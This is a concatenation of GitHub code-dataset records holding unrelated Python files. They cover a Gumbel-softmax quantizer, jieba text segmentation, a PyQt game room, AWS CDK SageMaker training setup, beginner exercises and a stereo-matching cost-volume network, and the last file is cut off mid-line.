temperature=self.tau_p\n )\n # single sample\n KL_qp = q.log_prob(z) - p.log_prob(z)\n\n # # multiple sample 100\n # y = q.rsample([100])\n # kl = q.log_prob(y) - p.log_prob(y)\n # KL_qp = kl.mean(dim=0)\n\n # debug\n # print('q tau:', q.temperature)\n # print('p tau:', p.temperature)\n # print('q:', q.log_prob(z))\n # print('p:', p.log_prob(z))\n\n # Raise exception if contains nan\n if torch.isnan(KL_qp).any():\n log.info(\"q tau:\" + str(q.temperature.squeeze()))\n log.info(\"p tau:\" + str(p.temperature.squeeze()))\n # log.info('q.log_prob: ' + str(q.log_prob(z)))\n # log.info('p.log_prob: ' + str(p.log_prob(z)))\n log.info(\"Error: nan log probibility for relaxed kl\")\n nan_mask = torch.isnan(KL_qp)\n KL_qp = torch.where(torch.isnan(KL_qp), torch.zeros_like(KL_qp), KL_qp)\n log.info(\n \"nan length %d out of %d\\n\",\n nan_mask.sum().item(),\n torch.tensor(nan_mask.shape).prod(dim=0).item(),\n )\n raise RuntimeError(\"nan log probibility for relaxed kl\")\n\n return KL_qp\n\n def kl_categorical(self, logits_q):\n # Analytical KL with categorical prior\n p_cat = OneHotCategorical(logits=self.logits_p.expand_as(logits_q))\n q_cat = OneHotCategorical(logits=logits_q)\n KL_qp = kl_divergence(q_cat, p_cat)\n return KL_qp\n\n\n# TODO: if train tau: min value > 0, init\nclass ConcreteRelaxation(nn.Module):\n \"\"\"\n z: latent sampled from posterior q (z|x)\n \"\"\"\n\n def __init__(\n self,\n hard=True, # True - Straight Through Gumbel, False - GumbelSoftmax\n tau_mode=\"fix\", # 'fix', 'anneal', 'train'\n # for q temperature\n init_tau=1.0, # for anneal, fix\n base_tau=0.5, # for anneal\n anneal_rate=1e-4, # for anneal\n update_tau_every=1000, # for anneal\n # for KL\n K=10,\n M=2,\n kl_type=\"categorical\", # 'relaxed', 'categorical'\n logits_p=\"train\", # 'train', 'uniform'\n tau_p=1.0, # 'train', fixed positive float\n ):\n super().__init__()\n\n self.hard = hard\n if hard:\n assert kl_type == \"categorical\"\n\n self.KL = KLConcrete(K=K, M=M, kl_type=kl_type, logits_p=logits_p, tau_p=tau_p)\n\n self.tau_mode = tau_mode\n t = torch.FloatTensor(M, 1)\n if tau_mode == \"train\":\n # torch.nn.init.uniform_(t, a=0.5, b=10)\n # t.fill_(1.0)\n t.fill_(init_tau)\n self.tau = nn.Parameter(t)\n else:\n assert type(init_tau) in [int, float] and init_tau > 0\n self.tau = t.fill_(init_tau)\n self.tau = move_to_device(self.tau, cuda_device)\n if tau_mode == \"fix\":\n pass\n elif tau_mode == \"anneal\":\n self.tau_scheduler = AnnealingTemperature(\n init_tau=init_tau,\n base_tau=base_tau,\n anneal_rate=anneal_rate,\n N=update_tau_every,\n )\n\n def forward(self, logits_q):\n \"\"\"\n Draw sample and calculate KL\n logits_q: bsz × M × K\n \"\"\"\n\n self.tau.data.clamp_(min=3e-1, max=10.0)\n q = RelaxedOneHotCategorical(logits=logits_q, temperature=self.tau)\n # draw soft sample with reparameterization, preserve gradient\n z = q.rsample()\n\n # cast into hard sample\n if self.hard:\n z_hard = one_hot_argmax(z)\n # straight through gradient, hard sample has same gradient as soft sample\n z = (z_hard - z).detach() + z\n\n # calculate kl\n kl = self.KL(q, z, logits_q)\n\n # update tau during training, CAUTION: only call forward once within a batch\n # do not update if eval\n if self.tau_mode == \"anneal\" and self.training:\n tau_value = self.tau_scheduler.step()\n # self.tau = self.tau.fill_(tau_value)\n self.tau = move_to_device(\n torch.FloatTensor(self.tau.shape).fill_(tau_value), cuda_device\n )\n\n return {\"z\": z, \"kl\": kl}\n\n def check_paramater(self, config):\n tau_q = self.tau.data.squeeze()\n print(\"\\ntau_q mode: \", config.concrete.tau.mode)\n print(\"tau_q: \", tau_q)\n\n logits_p = self.KL.logits_p\n print(\"\\nlogits_p mode: \", config.concrete.kl.prior_logits)\n print(\"probs_p: \", torch.softmax(logits_p, dim=-1)[0])\n\n if hasattr(self.KL, \"tau_p\"):\n tau_p = self.KL.tau_p.data.squeeze()\n print(\"\\ntau_p mode: \", config.concrete.kl.prior_tau)\n print(\"tau_p: \", tau_p)\n\n\nclass ConcreteQuantizer(nn.Module):\n \"\"\"\n Continuous relaxation of categorical distrubution (the two are equivalent)\n Concrete distribution: https://arxiv.org/pdf/1611.00712.pdf\n Gumbel-Softmax distribution: https://arxiv.org/abs/1611.01144\n \"\"\"\n\n def __init__(self, config, num_embeddings, embedding_dim, split):\n super().__init__()\n\n self.K = num_embeddings\n self.D = embedding_dim\n self.M = split\n\n self.concrete = ConcreteRelaxation(\n hard=(config.concrete.hard == 1),\n tau_mode=config.concrete.tau.mode,\n init_tau=config.concrete.tau.init,\n base_tau=config.concrete.tau.anneal.base,\n anneal_rate=config.concrete.tau.anneal.rate,\n update_tau_every=config.concrete.tau.anneal.interval,\n K=self.K,\n M=self.M,\n kl_type=config.concrete.kl.type,\n logits_p=config.concrete.kl.prior_logits,\n tau_p=config.concrete.kl.prior_tau,\n )\n\n self.embeddings = nn.Parameter(torch.randn(self.M, self.K, self.D))\n\n # set to true when classification\n # freeze this part, but train modules on top\n self.force_eval = False\n\n def forward(self, logits):\n \"\"\"\n Case 1: sequence of vector\n Arg: logits - bsz x T x (M * K), tensor\n - or N x (M * K), packed sequence\n Return: quantized - bsz x T x (M * D)\n\n Case 2: single vector\n Arg: logits - bsz x (M * K), tensor\n Return: quantized - bsz x (M * D)\n \"\"\"\n\n # support PackedSequence\n packed_seq_util = PackedSequneceUtil()\n logits = packed_seq_util.preprocess(logits)\n\n # reshape logits: B_flatten x M x K\n # with B_flatten = bsz, or bsz * T, or N\n bsz = logits.shape[0]\n assert logits.shape[-1] == self.M * self.K\n logits = logits.view(-1, self.M, self.K)\n\n # z: B_flatten x M x K\n if self.training and not self.force_eval:\n # use concrete when train\n out = self.concrete(logits)\n z = out[\"z\"]\n kl = out[\"kl\"].sum()\n else:\n # simple argmax when eval\n z = one_hot_argmax(logits)\n kl = 0.0\n out = None\n\n # B_flatten x M x D\n quantized_stack = z.transpose(0, 1).bmm(self.embeddings).transpose(0, 1)\n # if prob is not one-hot, this is not exact index\n encoding_indices = torch.argmax(z, dim=-1)\n\n if packed_seq_util.is_packed:\n quantized_stack = packed_seq_util.postprocess(quantized_stack, pad=0.0)\n quantized = quantized_stack.view(\n [*quantized_stack.shape[:-2]] + [self.M * self.D]\n )\n encoding_indices = packed_seq_util.postprocess(encoding_indices, pad=-1)\n z = packed_seq_util.postprocess(z, pad=0.0)\n else:\n quantized_stack = quantized_stack.view(bsz, -1, self.M, self.D).squeeze(1)\n quantized = quantized_stack.reshape(bsz, -1, self.M * self.D).squeeze(1)\n encoding_indices = encoding_indices.view(bsz, -1, self.M).squeeze(1)\n z = z.view(bsz, -1, self.M, self.K).squeeze(1)\n\n return {\n # B x T (optional) x (M * D)\n \"quantized\": quantized,\n # B x T (optional) x M x D\n \"quantized_stack\": quantized_stack,\n # B x T (optional) x M\n \"encoding_indices\": encoding_indices,\n # kl sum\n \"kl\": kl,\n }\n","repo_name":"shuningjin/discrete-text-rep","sub_path":"src/models/concrete_quantizer.py","file_name":"concrete_quantizer.py","file_ext":"py","file_size_in_byte":11597,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"42804908427","text":"# coding=utf-8\nimport os\nimport jieba\nimport time\nimport threading\n\n# 目前cpu利用率仅占120%\n\n#往文件写要加这个\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nthreads = [] # 线程池\n\ndef thread(file, write_path):\n print(file + ':processing......')\n start_each = time.clock()\n with open(write_path, 'a+') as wf:\n with open(file) as rf:\n\n for line in rf:\n if line.startswith('') or line.startswith(''):\n continue\n seg_list = jieba.cut(line)\n list = []\n for word in seg_list:\n if (not word.__eq__(' ')) and (not word.__eq__(' ') and (not word.__eq__('\\t'))):\n list.append(word)\n wf.write(' '.join(list))\n end_each = time.clock()\n print(file + \":用时{0}s\".format(end_each - start_each))\n\n# 将文件夹下所有的文件分词并写出到一个文件里\ndef run(file_document_path,write_path):\n # 在linux中地址不用转码的\n # file_document_path = unicode(file_document_path, \"utf8\")\n # write_path = unicode(write_path, \"utf8\")\n start = time.clock()\n\n file_list = os.listdir(file_document_path)\n for file in file_list:\n # print file.decode('gbk') # window\n # print file # linux\n # 多线程\n\n threads.append(threading.Thread(target=thread, args=(file_document_path+file, write_path+file)))\n\n for t in threads:\n t.setDaemon(True) # 将线程声明为守护线程,必须在start()调用之前设置,不设置将会无限挂起\n t.start()\n threads.join() # 在子线程完成之前父线程会已知阻塞,防止提前结束\n\n end = time.clock()\n print(\"共用时{0}s\".format(end-start))\n pass\n\n\n\nif __name__ == '__main__':\n\n ## windows\n # run('D:/NLP/语料/sogouT/test/','D:/NLP/语料/sogouT/test.merge')\n\n ## linux\n run('/home/guanpf/语料/sogouT/test/','/home/guanpf/语料/sogouT/segment/')\n","repo_name":"flygoinggoing/sogouT","sub_path":"segment/segment_thread.py","file_name":"segment_thread.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"21600474924","text":"from .base import BaseCommand\nfrom ..reference import Reference\n\n\nclass BranchCreateCommand(BaseCommand):\n\n\tdef run(self, name):\n\t\theads = self.repository.references(\"heads\")\n\t\thead = self.repository.head()\n\n\t\tif heads.contains(name):\n\t\t\tprint(\"fatal: A branch named '%s' already exists.\" % name)\n\t\t\texit(5)\n\n\t\tref = Reference(name, head.expanded_sha)\n\n\t\theads.store(ref)\n","repo_name":"damian-rzeszot/git-py","sub_path":"git/commands/branch_create.py","file_name":"branch_create.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18089922799","text":"# importing libraries \nimport sys \n\nfrom PyQt5.QtWidgets import * \nfrom PyQt5.QtGui import * \nfrom PyQt5.QtCore import * \n\nfrom Room import Room\nimport config\n\nclass Cabinet(Room):\n \"\"\"\n Balcony window to pop up when player navigates to the Balcony Location\n \"\"\"\n def __init__(self):\n super().__init__(\"Cabinet\") \n # Calling the user interface function\n\n self.setRoomButtons()\n self.setInteractionButtons()\n self.setEasterEggButtons()\n\n def setRoomButtons(self):\n \t# Setting up buttons and other room windows\n self.kitchenButton = QPushButton(\"Kitchen\", self)\n self.kitchenButton.setGeometry(self.width/2-self.button_width/2,self.image_height-self.button_height,self.button_width,self.button_height)\n self.kitchenButton.clicked.connect(self.toKitchen)\n\n def setInteractionButtons(self):\n bw = 25\n bh = 25\n\n # Coffee Beans\n self.beansButton = QPushButton(\"\", self)\n self.beansButton.setIcon(QIcon(\"../images/icons/magnifying_glass.png\"))\n self.beansButton.setGeometry(288,695,bw,bh)\n self.beansButton.setStyleSheet(\"background-color: rgba(0, 255, 255, 0);\")\n self.beansButton.clicked.connect(self.toBeans)\n\n # Chemex\n self.chemexButton = QPushButton(\"\", self)\n self.chemexButton.setIcon(QIcon(\"../images/icons/magnifying_glass.png\"))\n self.chemexButton.setGeometry(565,545,bw,bh)\n self.chemexButton.setStyleSheet(\"background-color: rgba(0, 255, 255, 0);\")\n self.chemexButton.clicked.connect(self.toChemex)\n\n # Filters\n self.filterButton = QPushButton(\"\", self)\n self.filterButton.setIcon(QIcon(\"../images/icons/magnifying_glass.png\"))\n self.filterButton.setGeometry(170,650,bw,bh)\n self.filterButton.setStyleSheet(\"background-color: rgba(0, 255, 255, 0);\")\n self.filterButton.clicked.connect(self.toFilters)\n\n # Frother\n self.frotherButton = QPushButton(\"\", self)\n self.frotherButton.setIcon(QIcon(\"../images/icons/magnifying_glass.png\"))\n self.frotherButton.setGeometry(735,545,bw,bh)\n self.frotherButton.setStyleSheet(\"background-color: rgba(0, 255, 255, 0);\")\n self.frotherButton.clicked.connect(self.toUnused)\n\n def setEasterEggButtons(self):\n # Mixed\n self.mixerButton = QPushButton(\"\", self)\n self.mixerButton.setGeometry(458,765,10,10)\n self.mixerButton.setStyleSheet(\"background-color: rgba(0, 255, 255, 0);\")\n self.mixerButton.clicked.connect(self.toMixer)\n\n def toKitchen(self, checked):\n self.close()\n\n def toBeans(self, checked):\n self.grabObject(\"beans\")\n\n def toChemex(self, checked):\n # need image\n self.grabObject(\"chemex\")\n\n def toFilters(self, checked):\n # need image\n self.grabObject(\"filters\")\n\n def toMixer(self, checked):\n if config.progress.mixer_clicked == False:\n config.progress.easter_egg_count += 1\n config.progress.mixer_clicked = True\n self.playAudio(\"mixer\")","repo_name":"HagenFritz/nancy-drew-forced-quarantine","sub_path":"src/Cabinet.py","file_name":"Cabinet.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"17848791109","text":"import face_recognition as fr\nfrom app.engine import reconhece_face, get_rostos\nimport face_recognition_models\n\n\ndesconhecido = reconhece_face(\"./img/imgl.jpg\") #Fiz um teste de reconhecimento de imagem, para que o video reconheca\nif(desconhecido[0]):\n rosto_desconhecido = desconhecido[1][0]\n rostos_conhecidos, nomes_dos_rostos = get_rostos()\n resultados = fr.compare_faces(rostos_conhecidos, rosto_desconhecido)\n print(resultados)\n\n for i in range(len(rostos_conhecidos)):\n resultado = resultados[i]\n if(resultado):\n print(\"Rosto do\", nomes_dos_rostos[i], \"foi reconhecido\")\n\nelse:\n print(\"Nao foi encontrado nenhum rosto\")","repo_name":"luisGust4vo/Reconhecimento-de-Rosto","sub_path":"projeto/app/fotos.py","file_name":"fotos.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25392427980","text":"from aws_cdk import (core, aws_ec2 as ec2, aws_ecs as ecs, aws_ecs_patterns as\n ecs_patterns, aws_elasticache as ec, aws_rds as rds, aws_iam as iam)\nfrom .ecs_helper import GWEcsHelper\nfrom .gw_helper import GWAppHelper\n\nimport json\n\n\nclass GWDknTrainStack(core.Stack):\n\n def __init__(self, scope: core.Construct, id: str, \n vpc: ec2.Vpc, ecs_role: iam.Role, **kwargs) -> None:\n super().__init__(scope, id, **kwargs)\n \n dkn_train_image = \"233121040379.dkr.ecr.cn-northwest-1.amazonaws.com.cn/gw-dkn-train:latest\"\n\n cfg_dict = {}\n cfg_dict['name'] = 'dkn-train'\n cfg_dict['trigger_bucket']= \"{}-bucket-event\".format(cfg_dict['name'])\n lambda_train_role = GWAppHelper.create_lambda_train_role(self, cfg_dict['name'])\n sagemaker_train_role = GWAppHelper.create_sagemaker_train_role(self, cfg_dict['name'])\n\n #cfg_dict['input_bucket']= \"{}-bucket-model-{}\".format(cfg_dict['name'], cfg_dict['date'])\n #cfg_dict['output_bucket']= \"{}-bucket-model-{}\".format(cfg_dict['name'], cfg_dict['date'])\n\n hyperparameters = {'learning_rate': '0.0001', 'servable_model_die': '/opt/ml/model', 'loss_weight': '1.0', \n 'use_context': 'True', 'max_click_history': '30', 'num_epochs': '1', 'max_title_length': '16', 'entity_dim': '128', \n 'word_dim': '300', 'batch_size': '128', 'perform_shuffle': '1', 'checkpointPath': '/opt/ml/checkpoints'}\n\n cfg_dict['hparams'] = json.dumps(hyperparameters)\n cfg_dict['input_train_bucket'] = \"autorec-great-wisdom/train.csv/\"\n cfg_dict['input_test_bucket'] = \"autorec-great-wisdom/test.csv/\"\n cfg_dict['output_bucket'] = \"autorec-great-wisdom/output_model/\"\n cfg_dict['ecr'] = 'sagemaker-recsys-dkn-train'\n cfg_dict['instance'] = \"ml.p2.xlarge\"\n # image = \"856419311962.dkr.ecr.cn-north-1.amazonaws.com.cn/gw-infer:latest\"\n # cfg_dict['image_uri'] = '002224604296.dkr.ecr.us-east-1.amazonaws.com/sagemaker-recsys-dkn-train'\n cfg_dict['image_uri'] = dkn_train_image\n cfg_dict['lambda_role'] = lambda_train_role\n cfg_dict['sagemaker_role'] = sagemaker_train_role\n self.dkn_train = GWAppHelper.create_trigger_training_task(self, **cfg_dict)\n\n\n","repo_name":"leewaylicn/GW-Rec-Release","sub_path":"cdk/gw_stack/deploy/gw_dkn_train_stack.py","file_name":"gw_dkn_train_stack.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"15673167526","text":"x = [ [5,2,3], [10,8,9] ]\nstudents = [\n {'first_name': 'Michael', 'last_name' : 'Jordan'},\n {'first_name' : 'John', 'last_name' : 'Rosales'}\n]\nsports_directory = {\n 'basketball' : ['Kobe', 'Jordan', 'James', 'Curry'],\n 'soccer' : ['Messi', 'Ronaldo', 'Rooney']\n}\nz = [ {'x': 10, 'y': 20} ]\n# --------10 to 15-----\n\n# x[1][0]= 15\n# print (x)\n\n# #------- jordan to Bryant------\n\n# students[0]['last_name']= \"Bryant\"\n# print (students)\n\n# #------messi to andres\n# sports_directory['soccer'][0] = \"andreas\"\n# print (sports_directory)\n\n# #----20 to 30 \n# z[0]['y']= 30\n# print(z)\n\n\n\n#2. Iterate Through a List of Dictionaries\nstudents = [\n{'first_name': 'Michael', 'last_name' : 'Jordan'},\n{'first_name' : 'John', 'last_name' : 'Rosales'},\n{'first_name' : 'Mark', 'last_name' : 'Guillen'},\n{'first_name' : 'KB', 'last_name' : 'Tonel'}\n]\n\n# def iterateDictionary(some_list):\n# for students in some_list:\n# for key, value in students.items():\n# print(f\"{key}: {value}\")\n\n# iterateDictionary(students)\n\n\n# #Get Values From a List of Dictionaries\n# def iterateDictionary2(key_name, some_list):\n# for dictionary in some_list:\n# if key_name in dictionary:\n# print(dictionary[key_name])\n# iterateDictionary2('first_name', students)\n\n# def iterateDictionary2(key_name, some_list):\n# for dictionary in some_list:\n# if key_name in dictionary:\n# print(dictionary[key_name])\n# iterateDictionary2('last_name', students)\n\n# 4. Iterate Through a Dictionary with List Values\n\ndojo = {\n 'locations': ['San Jose', 'Seattle', 'Dallas', 'Chicago', 'Tulsa', 'DC', 'Burbank'],\n 'instructors': ['Michael', 'Amy', 'Eduardo', 'Josh', 'Graham', 'Patrick', 'Minh', 'Devon']\n}\n\ndef printInfo(some_dict):\n for key, value in some_dict.items():\n print(f\"{key} - {len(value)}\")\n for item in value:\n print(item)\nprintInfo(dojo)","repo_name":"FehriAziz/python_stacks","sub_path":"01-python-fundamental/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20017625056","text":"import turtle\r\nt=turtle.Turtle()\r\nt.shape(\"turtle\")\r\necra=turtle.getscreen()\r\nt.left(90)\r\nfor i in range(10):\r\n if i % 2==0:\r\n t.right(90)\r\n t.forward(50)\r\n if i % 2 !=0:\r\n t.left(90)\r\n t.forward(50)\r\necra.mainloop\r\n","repo_name":"Ruben15263/Python","sub_path":"escada.py","file_name":"escada.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21602053958","text":"BPE_FROM_PICKLE = True\nBPE_PATH = \"GCEBPE4m.model\"\n\nPYTORCH_TRANSFORMER = False\nSELF_ATTN = \"ORIGINAL\" #\"ORIGINAL\"|\"SUMMARIZED\"|\"OUR\"|\"CROSS\"\nLOAD_NEW_METHOD = True\nUSE_BPE = False\nMAX_LEN = 500\nGPUS = 4\nMAX_EPOCHS = 2\nPRECISION = 32 #32|16\nLEARNING_RATE = 3e-2\n\nN_LAYERS = 6\nNUM_HEADS = 8\nFORWARD_EXP = 4\n\nTRAIN_SRC = '.data/multi30k/train.en'\nTRAIN_TGT = '.data/multi30k/train.en'\nVAL_SRC = '.data/multi30k/val.en'\nVAL_TGT = '.data/multi30k/val.en'\nTEST_SRC = '.data/multi30k/test2016.en'\nTEST_TGT = '.data/multi30k/test2016.en'\n\nsentences = []\nsentences.append(\"A horse is walking beside a boat under a bridge.\")\nsentences.append(\"Two men are removing tree branches.\")\nsentences.append(\"A young boy in a red life jacket is swimming in a pool.\")\nsentences.append(\"Two kids are swinging on a playground.\")","repo_name":"zaidhassanch/PointerNetworks","sub_path":"Tranformers/T003b_transformerLightning/T004_zTranformerLightning/configs/config_engtoeng.py","file_name":"config_engtoeng.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7695741280","text":"from django.urls import path\n\nfrom common import views\n\nurlpatterns = [\n # 新添栏目\n path('add_column/', views.add_column),\n # 显示所有栏目,不分等级\n path('get_column_all/', views.get_column_all),\n # 显示一级栏目,将其余子栏目加入到child中\n path('get_one_column/', views.get_one_column),\n]\n","repo_name":"17-12-20-ll/madao_success","sub_path":"common/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14608885099","text":"from __future__ import print_function\nfrom .util import Equirec2Cube\nfrom .util import Cube2Equirec\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.utils.data\nfrom PIL import Image\nimport torch.nn.functional as F\nfrom .submodule import *\nimport math\n\n\nclass forfilter(nn.Module):\n def __init__(self, inplanes):\n super(forfilter, self).__init__()\n\n self.forfilter1 = nn.Conv2d(1, 1, (7, 1), 1, (0, 0), bias=False)\n self.inplanes = inplanes\n\n def forward(self, x):\n out = self.forfilter1.cuda()(F.pad(torch.unsqueeze(x[:, 0, :, :], 1), pad=[0, 0, 3, 3], mode='replicate'))\n # ([1, 1, 134, 256])\n for i in range(1, self.inplanes):\n out = torch.cat((out, self.forfilter1(F.pad(torch.unsqueeze(x[:, i, :, :], 1), pad=[0, 0, 3, 3],\n mode='replicate'))), 1)\n return out\n\n\nclass disparityregression_sub3(nn.Module):\n def __init__(self, maxdisp):\n super(disparityregression_sub3, self).__init__()\n self.disp = Variable(torch.Tensor(\n np.reshape(np.array(range(maxdisp * 3)), [1, maxdisp * 3, 1, 1]) /\n 3).cuda(), requires_grad=False)\n\n def forward(self, x):\n disp = self.disp.repeat(x.size()[0], 1, x.size()[2], x.size()[3])\n out = torch.sum(x * disp, 1)\n return out\n\n\nclass hourglass(nn.Module):\n def __init__(self, inplanes):\n super(hourglass, self).__init__()\n\n self.conv1 = nn.Sequential(convbn_3d(inplanes, inplanes * 2, kernel_size=3, stride=2, pad=1),\n nn.ReLU(inplace=True))\n\n self.conv2 = convbn_3d(inplanes * 2, inplanes * 2, kernel_size=3, stride=1, pad=1)\n\n self.conv3 = nn.Sequential(convbn_3d(inplanes * 2, inplanes * 2, kernel_size=3, stride=2, pad=1),\n nn.ReLU(inplace=True))\n\n self.conv4 = nn.Sequential(convbn_3d(inplanes * 2, inplanes * 2, kernel_size=3, stride=1, pad=1),\n nn.ReLU(inplace=True))\n\n self.conv5 = nn.Sequential(\n nn.ConvTranspose3d(inplanes * 2, inplanes * 2, kernel_size=3, padding=1, output_padding=1, stride=2,\n bias=False),\n nn.BatchNorm3d(inplanes * 2)) # +conv2\n\n self.conv6 = nn.Sequential(\n nn.ConvTranspose3d(inplanes * 2, inplanes, kernel_size=3, padding=1, output_padding=1, stride=2,\n bias=False),\n nn.BatchNorm3d(inplanes)) # +x\n\n def forward(self, x, presqu, postsqu):\n\n out = self.conv1(x) # in:1/4 out:1/8\n pre = self.conv2(out) # in:1/8 out:1/8\n if postsqu is not None:\n pre = F.relu(pre + postsqu, inplace=True)\n else:\n pre = F.relu(pre, inplace=True)\n\n out = self.conv3(pre) # in:1/8 out:1/16\n out = self.conv4(out) # in:1/16 out:1/16\n\n if presqu is not None:\n post = F.relu(self.conv5(out) + presqu, inplace=True) # in:1/16 out:1/8\n else:\n post = F.relu(self.conv5(out) + pre, inplace=True)\n\n out = self.conv6(post) # in:1/8 out:1/4\n\n return out, pre, post\n\n\nclass cost_basic(nn.Module):\n def __init__(self, maxdisp):\n super(cost_basic, self).__init__()\n self.maxdisp = maxdisp\n\n self.dres0_0 = nn.Sequential(convbn_3d(64, 32, 3, 1, 1),\n nn.ReLU(inplace=True),\n convbn_3d(32, 32, 3, 1, 1),\n nn.ReLU(inplace=True))\n\n self.dres1_0 = nn.Sequential(convbn_3d(32, 32, 3, 1, 1),\n nn.ReLU(inplace=True),\n convbn_3d(32, 32, 3, 1, 1),\n nn.ReLU(inplace=True))\n self.dres0_1 = nn.Sequential(convbn_3d(64, 32, 3, 1, 1),\n nn.ReLU(inplace=True),\n convbn_3d(32, 32, 3, 1, 1),\n nn.ReLU(inplace=True))\n\n self.dres1_1 = nn.Sequential(convbn_3d(32, 32, 3, 1, 1),\n nn.ReLU(inplace=True),\n convbn_3d(32, 32, 3, 1, 1),\n nn.ReLU(inplace=True))\n self.dres2 = hourglass(32)\n\n self.dres3 = hourglass(32)\n\n self.dres2_1 = hourglass(32)\n\n self.dres3_1 = hourglass(32)\n\n self.dres4 = hourglass(32)\n\n self.fuse0 = nn.Sequential(convbn_3d(64, 32, 3, 1, 1),\n nn.ReLU(inplace=True),\n convbn_3d(32, 32, 3, 1, 1),\n nn.ReLU(inplace=True))\n self.fuse1 = nn.Sequential(convbn_3d(64, 32, 3, 1, 1),\n nn.ReLU(inplace=True),\n convbn_3d(32, 32, 3, 1, 1),\n nn.ReLU(inplace=True))\n self.classif1 = nn.Sequential(\n convbn_3d(32, 32, 3, 1, 1), nn.ReLU(inplace=True),\n nn.Conv3d(32, 1, kernel_size=3, padding=1, stride=1, bias=False))\n\n self.classif2 = nn.Sequential(\n convbn_3d(32, 32, 3, 1, 1), nn.ReLU(inplace=True),\n nn.Conv3d(32, 1, kernel_size=3, padding=1, stride=1, bias=False))\n\n self.classif3 = nn.Sequential(\n convbn_3d(32, 32, 3, 1, 1), nn.ReLU(inplace=True),\n nn.Conv3d(32, 1, kernel_size=3, padding=1, stride=1, bias=False))\n self.c2e = Cube2Equirec(32, 64, 128)\n self.e2c = Equirec2Cube(64, 128, 32)\n self.forF = forfilter(32)\n self.forF1 = forfilter(32)\n\n def forward(self, outputs_up, outputs_down, training):\n global pred1, pred2\n cube_feat1 = torch.from_numpy(\n self.e2c.run(outputs_up[0].cpu().detach().numpy()).astype(np.float16)[np.newaxis, :]).cuda()\n cube_feat2 = torch.from_numpy(\n self.e2c.run(outputs_down[0].cpu().detach().numpy()).astype(np.float16)[np.newaxis, :]).cuda()\n if not training:\n cube_feat1 = torch.tensor(cube_feat1, dtype=torch.float32)\n cube_feat2 = torch.tensor(cube_feat2, dtype=torch.float32)\n #print(\"begin my cost catch:\", \"\\n\", \"cube_up:\", np.shape(cube_feat1), \"output_up\", np.shape(outputs_up), \"\\n\",\n # \"cube_down:\", np.shape(cube_feat2), \"outputs_down\", np.shape(outputs_down))\n cost = Variable(\n torch.zeros(outputs_up.size()[0],\n outputs_up.size()[1] * 2, int(self.maxdisp / 4 * 3),\n outputs_up.size()[2],\n outputs_up.size()[3]), requires_grad=True).cuda()\n\n for i in range(int(self.maxdisp / 4 * 3)):\n if i > 0:\n cost[:, :outputs_up.size()[1], i, :, :] = outputs_down[:, :, :, :]\n cost[:, outputs_up.size()[1]:, i, :, :] = shift_down[:, :, :, :]\n shift_down = self.forF(shift_down)\n else:\n cost[:, :outputs_up.size()[1], i, :, :] = outputs_down\n cost[:, outputs_up.size()[1]:, i, :, :] = outputs_up\n shift_down = self.forF(outputs_up)\n\n cost1 = Variable(\n torch.zeros(cube_feat1.size()[0],\n cube_feat1.size()[1] * 2, 16,\n cube_feat1.size()[2],\n cube_feat1.size()[3]), requires_grad=True).cuda()\n siz3 = cube_feat1.size()[3]\n for i in range(16):\n if i > 0:\n cost1[:, :cube_feat1.size()[1], i, :, :int(siz3 / 3 * 2)] = cube_feat1[:, :, :, :int(siz3 / 3 * 2)]\n cost1[:, cube_feat1.size()[1]:, i, :, :int(siz3 / 3 * 2)] = shift_cube2[:, :, :, :]\n # ([1, 32, 63, 256])\n shift_cube2 = self.forF1(shift_cube2)\n\n cost1[:, :cube_feat1.size()[1], i, :, int(siz3 / 3 * 2):int(siz3 / 6 * 5)] \\\n = cube_feat1[:, :, :, int(siz3 / 3 * 2):int(siz3 / 6 * 5)]\n cost1[:, cube_feat1.size()[1]:, i, :, int(siz3 / 3 * 2):int(siz3 / 6 * 5)] \\\n = cost_ud().run(cube_feat2[:, :, :, int(siz3 / 3 * 2):int(siz3 / 6 * 5)], i)\n\n cost1[:, :cube_feat1.size()[1], i, :, -int(siz3 / 6 * 1):] \\\n = cost_ud().run(cube_feat1[:, :, :, -int(siz3 / 6 * 1):], i)\n\n cost1[:, cube_feat1.size()[1]:, i, :, -int(siz3 / 6 * 1):] \\\n = cube_feat2[:, :, :, -int(siz3 / 6 * 1):]\n\n else:\n cost1[:, :cube_feat1.size()[1], i, :, :] = cube_feat1[:, :, :, :]\n cost1[:, cube_feat1.size()[1]:, i, :, :] = cube_feat2[:, :, :, :]\n\n shift_cube2 = self.forF1(cube_feat2[:, :, :, :int(siz3 / 3 * 2)])\n\n cost = cost.contiguous() # ([1, 64, 32, 128, 256])\n cost2 = cost1.contiguous() # ([1, 64, 16, 64, 384])\n cost_cube = torch.zeros(cost.size()[0], cost.size()[1], cost.size()[2], cost.size()[3], cost.size()[4]).cuda()\n for p in range(cost2.size()[2]):\n cost_cube[:, :, p, :, :] = self.c2e.run(cost1[:, :, p, :, :])\n\n cost0 = self.dres0_0(cost)\n cost0 = self.dres1_0(cost0) + cost0 # cost0[1, 32, 12, 128, 256]\n cost0_cube = self.dres0_1(cost_cube)\n cost0_cube = 